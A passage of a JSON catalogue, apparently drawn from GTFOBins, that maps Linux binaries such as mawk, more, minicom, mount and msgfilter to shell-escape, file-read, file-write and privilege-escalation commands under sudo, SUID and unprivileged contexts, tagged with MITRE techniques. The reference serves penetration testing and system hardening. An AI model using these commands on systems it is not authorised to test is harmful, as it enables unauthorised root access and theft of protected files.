less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"man man","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/man/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:man:shell:0:sudo","toolId":"gtfo:man","toolName":"man","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"man '-H/bin/sh #' man","description":"This requires GNU `troff` (`groff`) to be installed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/man/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:man:shell:0:suid","toolId":"gtfo:man","toolName":"man","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"man '-H/bin/sh #' man","description":"This requires GNU `troff` (`groff`) to be installed.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/man/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:man:shell:0:unprivileged","toolId":"gtfo:man","toolName":"man","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"man '-H/bin/sh #' man","description":"This requires GNU `troff` (`groff`) to be installed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/man/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mawk:file-read:0:sudo","toolId":"gtfo:mawk","toolName":"mawk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["awk"]},{"id":"gtfo:mawk:file-read:0:suid","toolId":"gtfo:mawk","toolName":"mawk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["awk"]},{"id":"gtfo:mawk:file-read:0:unprivileged","toolId":"gtfo:mawk","toolName":"mawk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"mawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["awk"]},{"id":"gtfo:mawk:file-write:0:sudo","toolId":"gtfo:mawk","toolName":"mawk","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"mawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["awk"]},{"id":"gtfo:mawk:file-write:0:suid","toolId":"gtfo:mawk","toolName":"mawk","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"mawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["awk"]},{"id":"gtfo:mawk:file-write:0:unprivileged","toolId":"gtfo:mawk","toolName":"mawk","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"mawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["awk"]},{"id":"gtfo:mawk:shell:0:sudo","toolId":"gtfo:mawk","toolName":"mawk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["awk"]},{"id":"gtfo:mawk:shell:0:suid","toolId":"gtfo:mawk","toolName":"mawk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["awk"]},{"id":"gtfo:mawk:shell:0:unprivileged","toolId":"gtfo:mawk","toolName":"mawk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"mawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["awk"]},{"id":"gtfo:minicom:shell:0:sudo","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"minicom -D /dev/null","description":"Start the following command to open the TUI interface, then:\n\n1. press `Ctrl-A o` and select `Filenames and paths`;\n2. press `e`, type `/bin/sh`, then `Enter`;\n3. Press `Esc` twice;\n4. Press `Ctrl-A k` to drop the shell.\n\nAfter the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/minicom/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:minicom:shell:0:suid","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"minicom -D /dev/null","description":"Start the following command to open the TUI interface, then:\n\n1. press `Ctrl-A o` and select `Filenames and paths`;\n2. press `e`, type `/bin/sh -p`, then `Enter`;\n3. Press `Esc` twice;\n4. Press `Ctrl-A k` to drop the shell.\n\nAfter the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/minicom/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:minicom:shell:0:unprivileged","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"minicom -D /dev/null","description":"Start the following command to open the TUI interface, then:\n\n1. press `Ctrl-A o` and select `Filenames and paths`;\n2. press `e`, type `/bin/sh`, then `Enter`;\n3. Press `Esc` twice;\n4. Press `Ctrl-A k` to drop the shell.\n\nAfter the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/minicom/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:minicom:shell:1:sudo","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh </dev/tty 1>/dev/tty 2>/dev/tty' >/path/to/temp-file\nminicom -D /dev/null -S /path/to/temp-file\nreset^J","description":"After the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/minicom/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:minicom:shell:1:suid","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh </dev/tty 1>/dev/tty 2>/dev/tty' >/path/to/temp-file\nminicom -D /dev/null -S /path/to/temp-file\nreset^J","description":"After the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/minicom/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:minicom:shell:1:unprivileged","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh </dev/tty 1>/dev/tty 2>/dev/tty' >/path/to/temp-file\nminicom -D /dev/null -S /path/to/temp-file\nreset^J","description":"After the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/minicom/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:more:file-read:0:sudo","toolId":"gtfo:more","toolName":"more","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"more /path/to/input-file","description":"The file is displayed in the terminal interface.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/more/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:more:file-read:0:suid","toolId":"gtfo:more","toolName":"more","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"more /path/to/input-file","description":"The file is displayed in the terminal interface.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/more/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:more:file-read:0:unprivileged","toolId":"gtfo:more","toolName":"more","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"more /path/to/input-file","description":"The file is displayed in the terminal interface.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/more/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:more:shell:0:sudo","toolId":"gtfo:more","toolName":"more","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"more /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/more/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:more:shell:0:suid","toolId":"gtfo:more","toolName":"more","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"more /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/more/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:more:shell:0:unprivileged","toolId":"gtfo:more","toolName":"more","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"more /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/more/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mosh-server:shell:0:sudo","toolId":"gtfo:mosh-server","toolName":"mosh-server","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mosh --server=mosh-server localhost /bin/sh","description":"The `mosh-server` has to be executed via `sudo`, e.g., `'--server=sudo mosh-server'`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mosh-server/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mosquitto:file-read:0:sudo","toolId":"gtfo:mosquitto","toolName":"mosquitto","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mosquitto -c /path/to/input-file","description":"The file is actually parsed and the first wrong line (ending with a newline or a null character) is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mosquitto/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mosquitto:file-read:0:suid","toolId":"gtfo:mosquitto","toolName":"mosquitto","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mosquitto -c /path/to/input-file","description":"The file is actually parsed and the first wrong line (ending with a newline or a null character) is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mosquitto/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mosquitto:file-read:0:unprivileged","toolId":"gtfo:mosquitto","toolName":"mosquitto","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"mosquitto -c /path/to/input-file","description":"The file is actually parsed and the first wrong line (ending with a newline or a null character) is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mosquitto/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mount:privilege-escalation:0:sudo","toolId":"gtfo:mount","toolName":"mount","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"mount -o bind /bin/sh /bin/mount\nmount","description":"This overrides `mount` itself with a shell (or any other executable).","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mount/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msfconsole:inherit:0:sudo","toolId":"gtfo:msfconsole","toolName":"msfconsole","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["inherit"],"command":"msfconsole\nirb","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msfconsole/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msfconsole:inherit:0:unprivileged","toolId":"gtfo:msfconsole","toolName":"msfconsole","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["inherit"],"command":"msfconsole\nirb","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msfconsole/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgattrib:file-read:0:sudo","toolId":"gtfo:msgattrib","toolName":"msgattrib","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgattrib -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgattrib/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgattrib:file-read:0:suid","toolId":"gtfo:msgattrib","toolName":"msgattrib","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgattrib -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgattrib/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgattrib:file-read:0:unprivileged","toolId":"gtfo:msgattrib","toolName":"msgattrib","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msgattrib -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgattrib/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgcat:file-read:0:sudo","toolId":"gtfo:msgcat","toolName":"msgcat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgcat -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgcat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgcat:file-read:0:suid","toolId":"gtfo:msgcat","toolName":"msgcat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgcat -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgcat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgcat:file-read:0:unprivileged","toolId":"gtfo:msgcat","toolName":"msgcat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msgcat -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgcat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgconv:file-read:0:sudo","toolId":"gtfo:msgconv","toolName":"msgconv","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgconv -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgconv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgconv:file-read:0:suid","toolId":"gtfo:msgconv","toolName":"msgconv","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgconv -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgconv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgconv:file-read:0:unprivileged","toolId":"gtfo:msgconv","toolName":"msgconv","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msgconv -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgconv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgfilter:file-read:0:sudo","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgfilter -P -i /path/to/input-file /bin/cat","description":"The file is parsed and displayed as a Java `.properties` file. `/bin/cat` can be replaced with any other *filter* program.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgfilter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgfilter:file-read:0:suid","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgfilter -P -i /path/to/input-file /bin/cat","description":"The file is parsed and displayed as a Java `.properties` file. `/bin/cat` can be replaced with any other *filter* program.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgfilter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgfilter:file-read:0:unprivileged","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msgfilter -P -i /path/to/input-file /bin/cat","description":"The file is parsed and displayed as a Java `.properties` file. `/bin/cat` can be replaced with any other *filter* program.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgfilter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgfilter:shell:0:sudo","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo x | msgfilter -P /bin/sh -c '/bin/sh 0<&2 1>&2; kill $PPID'","description":"The `kill` command is needed to spawn the shell only once. Instead of readinf from standard input, it can read files passed via the `-i` option.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgfilter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgfilter:shell:0:suid","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo x | msgfilter -P /bin/sh -p -c '/bin/sh -p 0<&2 1>&2; kill $PPID'","description":"The `kill` command is needed to spawn the shell only once. Instead of readinf from standard input, it can read files passed via the `-i` option.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgfilter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgfilter:shell:0:unprivileged","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo x | msgfilter -P /bin/sh -c '/bin/sh 0<&2 1>&2; kill $PPID'","description":"The `kill` command is needed to spawn the shell only once. Instead of readinf from standard input, it can read files passed via the `-i` option.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgfilter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgmerge:file-read:0:sudo","toolId":"gtfo:msgmerge","toolName":"msgmerge","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgmerge -P /path/to/input-file /dev/null","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgmerge/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgmerge:file-read:0:suid","toolId":"gtfo:msgmerge","toolName":"msgmerge","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgmerge -P /path/to/input-file /dev/null","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgmerge/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgmerge:file-read:0:unprivileged","toolId":"gtfo:msgmerge","toolName":"msgmerge","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msgmerge -P /path/to/input-file /dev/null","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgmerge/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msguniq:file-read:0:sudo","toolId":"gtfo:msguniq","toolName":"msguniq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msguniq -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msguniq/"],"compatibility":"Linux reference. 